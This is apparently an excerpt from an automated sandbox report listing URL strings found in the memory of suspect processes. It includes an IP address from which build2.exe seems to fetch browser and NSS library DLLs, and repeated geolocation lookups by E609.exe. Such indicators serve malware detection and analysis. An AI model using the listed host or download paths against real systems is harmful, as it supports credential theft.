Source: build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/f
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll/d
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll5d-
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dllSd
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dllYd
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/i
Source: build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/j
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dll
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dlla
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dllppData
Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dlly
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/pe
Source: build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/r
Source: build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/rosoft
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/rpriseCertificates
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/s
Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sf
Source: build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dll3e
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dllqd
Source: build2.exe, 00000013.00000002.2651384676.000000000052E000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000829000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sqls.dll
Source: build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/tography
Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll65.109.242.59
Source: build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dllHp
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/ws
Source: build2.exe, 00000013.00000002.2651384676.0000000000553000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59DHDA
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59DHIE
Source: build2.exe, 00000013.00000003.2318827088.00000000008A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.5P
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1692249717.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008D32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: E609.exe, 0000000A.00000002.2053964742.000000000059A000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/Root
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/au
Source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000F.00000003.2069180655.0000000000894000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2086486753.000000000075E000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2085516872.0000000000765000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211493780.0000000000787000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211670319.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2210896426.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211493780.0000000000748000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json)
Source: E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json-Agent:
Source: E609.exe, 00000011.00000003.2086486753.000000000075E000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2085516872.0000000000765000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json.
Source: E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonG
Source: E609.exe, 0000001B.00000002.2211670319.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2210896426.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.00000000007D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonJ
Source: E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonR
Source: E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonV_
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonY
Source: E609.exe, 00000021.00000002.2275857903.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonje
Source: E609.exe, 0000001B.00000002.2211493780.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonq
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2710261616.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1690075566.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?s
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000002A.00000003.2709284810.0000000008F4F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2708310772.0000000008F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008E46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?R
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 0000002A.00000003.2710261616.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000001.00000000.1690075566.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bing.c
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
